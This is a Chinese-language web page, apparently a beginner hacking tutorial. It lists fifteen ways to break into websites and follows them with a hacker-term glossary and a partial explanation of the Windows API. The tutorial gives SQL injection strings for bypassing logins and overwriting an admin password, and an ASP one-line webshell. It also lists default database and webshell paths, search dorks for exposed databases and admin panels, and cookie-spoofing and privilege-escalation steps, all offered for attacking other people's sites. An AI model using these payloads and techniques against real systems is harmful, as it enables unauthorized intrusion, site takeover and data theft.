搜索
一:菜鸟入侵的15钟方法1.上传漏洞[不多讲]pS:如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”,80%就有漏洞了!有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.2.注入漏洞[不多讲]pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:http://注入网址;updateadminsetpassword=’新MD5密码’wherepassword=’旧MD5密码’--[admin为表名.]3.旁注,也就是跨站.我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了4.暴库:把二级目录中间的/换成%5cEY:=test&;amp;test=1如果你能看到:’E:\test\test\database\test.asa’不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:’or’’=’ora=a’)or(’a’=’a)or(a=aor1=1--’or’a’=’a6.社会工程学。这个我们都知道吧。就是猜解。7.写入ASP格式数据库。就是一句话木马[%executerequest(value)%],常用在留言本.EY:[这个就是ASP格式的数据库],再写入一句话木马8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.EY:这个站用的是:杰出校友录,源码我下过了,默认数据库/webshell路径:\database\liangu_data.mdb后台管理:adm_login.asp密码及用户名都是admin9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL./Databackup/dvbbs7.MDB/bbs/Databackup/dvbbs7.MDB/bbs/Data/dvbbs7.MDB/data/dvbbs7.mdb/bbs/diy.asp/diy.asp/bbs/cmd.asp/bbs/cmd.exe/bbs/s-u.exe/bbs/servu.exe工具:网站猎手挖掘鸡EY:查看目录法:人一些网站可以断开目录,可以方问目录。EY:://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/这样我们可以找到数据库,下载不用我教吧11.工具溢出:.asp?NewsID=/2j.asp?id=18.asp?id=[这种方法可以取得大量的WEBSHELL]12.搜索引擎利用:(1).inurl:flasher_list.asp默认数据库:database/flash.mdb后台/manager/(2).找网站的管理后台地址:site:xxxx.comintext:管理site:xxxx.comintitle:管理关键字很多,自已找site:xxxx.cominurl:login(3).查找access的数据库,mssql、mysql的连接文件allinurl:bbsdatafiletype:mdbinurl:databasefiletype:incconninurl:datafiletype:mdb我主不做了。。自已做做吧。。13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了14.利用常见的漏洞:如动网BBS可以先用:dvbbs权限提升工具,使自已成为前台管理员。THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包这个我就不做了,网上教程多的是,自已下个看看。工具:dvbbs权限提升工具动网固顶贴工具15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETECGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。二:黑客术语之系统篇肉鸡肉鸡就是具有最高管理权限的远程电脑。简单的说就是受你控制的远程电脑。肉鸡可以是win、Unix/Linux……等各种系统;肉鸡可以是一家公司的服务器,一家网站的服务器,甚至是美国白宫或军方的电脑,只要你有这本事入侵并控制他,要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。3389、4899肉鸡3389是Windows终端服务(TerminalServices)所默认使用的端口号,该服务是微软为了方便网络管理员远程管理及维护服务器而推出的,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上,成功登陆后就会象操作自己的电脑一样来操作主机了。这和远程控制软件甚至是木马程序实现的功能很相似,终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门帐号,然后再开启对方的终端服务,这样,自己就随时可以使用终端服务来控制对方了,这样的主机,通常就会被叫做3389肉鸡。Radmin是一款非常优秀的远程控制软件,4899就是Radmin默认使以也经常被黑客当作木马来使用(正是这个原因,目前的杀毒软件也对Radmin查杀了)。有的人在使用的服务端口号。因为Radmin的控制功能非常强大,传输速度也比大多数木马快,而且又不被杀毒软件所查杀,所用Radmin管理远程电脑时使用的是空口令或者是弱口令,黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机,然后就可以登陆上去远程控制对恶劣,这样被控制的主机通常就被成做4899肉鸡。跳板一个具有辅助作用的机器,利用这个主机作为一个间接的工具,来入侵其他的主机,一般和肉鸡连用。注入随着B/S模式应用开发的发展,使用这种模式编写程序的程序员越来越来越多,但是由于程序员的水平参差不齐相当大一部分应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想要知的数据,这个就是所谓的SQLinjection,即:SQL注意入。注入点是可以实行注入的地方,通常是一个访问数据库的连接。根据注入点数据库的运行帐号的权限的不同,你所得到的权限也不同。溢出确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。默认共享默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享,因为加了$符号,所以看不到共享的托手图表,也成为隐藏共享。端口(Port)相当于一种数据的传输通道。用于接受某些数据,然后传输给相应的服务,而电脑将这些数据处理后,再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务,要关闭这些端口只需要将对应的服务关闭就可以了。shellshell就是系统于用户的交换式界面。简单来说,就是系统与用户的一个沟通环境,我们平时用到的DOS就是一个shell。(Win2K是cmd.exe)shell是一种操作系统用户交互界面的Unix工具,它是理解和执行用户输入的命令的程序层。在一些系统中,shell称为命令解析器。shell通常指命令语法界面(想象DOS操作系统及其“C:”提示符以及“dir”、“edit”等用户命令)。rootUnix里最高权限的用户,也就是超级管理员。rootkitrootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。adminwindowsNT,2K,XP里最高权限的用户,也就是超级管理员。rootshell通过一个溢出程序,在主机溢出一个具有root权限的shell。exploit溢出程序。exploit里通常包含一些shellcode。shellcode溢出攻击要调用的API函数,溢出后要有一个交换式界面进行操作。所以说就有了shellcode。API(ApplicationProgrammingInterface)应用程序编程接口是操作系统为程序开发人员提供的一组函数库,开发人员可以通过调用API简易的实现一些操作系统已经提供的功能。(下面有API的详细解释)AccesControllist(ACL)访问控制列表。AddressResolutionProtocol(ARP)地址解析协议。Administratoraccount管理员帐号。ARPANET阿帕网(Internet的简称)。accesstoken访问令牌。adaptivespeedleveling自适应速度等级调整。algorithm算法alias别名。anlpasswd一种与PASSWD+相似的代理密码检查器。applicatlons应用程序异步传递模式。accoutlockout帐号封锁。accoutpolicies记帐策略。accounts帐号。adapter适配器。IPC$是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。什么是API(ApplicationProgrammingInterface)首先,有必要向大家讲一讲,什么是API。所谓API本来是为C和C++程序员写的。API说来说去,就是一种函数,他们包含在一个附加名为DLL的动态连接库文件中。用标准的定义来讲,API就是Windows的32位应用程序编程接口,是一系列很复杂的函数,消息和结构,它使编程人员可以用不同类型的编程语言编制出的运行在Windows95和WindowsNT操作系统上的应用程序。可以说,如果你曾经学过VC,那么API对你来说不是什么问题。但是如果你没有学过VC,或者你对Windows95的结构体系不熟悉,那么可以说,学习API将是一件很辛苦的事情。如果你打开WINDOWS的SYSTEM文件夹,你可以发现其中有很多附加名为DLL的文件。一个DLL中包含的API函数并不只是一个,数十个,甚至是数百个。我们能都掌握它嘛?回答是否定的∶不可能掌握。但实际上,我们真的没必要都掌握,只要重点掌握Windos系统本身自带的API函数就可以了。但,在其中还应当抛开掉同VB本身自有的函数重复的函数。如,VB的etAttr命令可以获得文件属性,SetAttr可以设置文件属性。对API来讲也有对应的函数GetFileAttributes和SetFileAttributes,性能都差不多。如此地一算,剩下来的也就5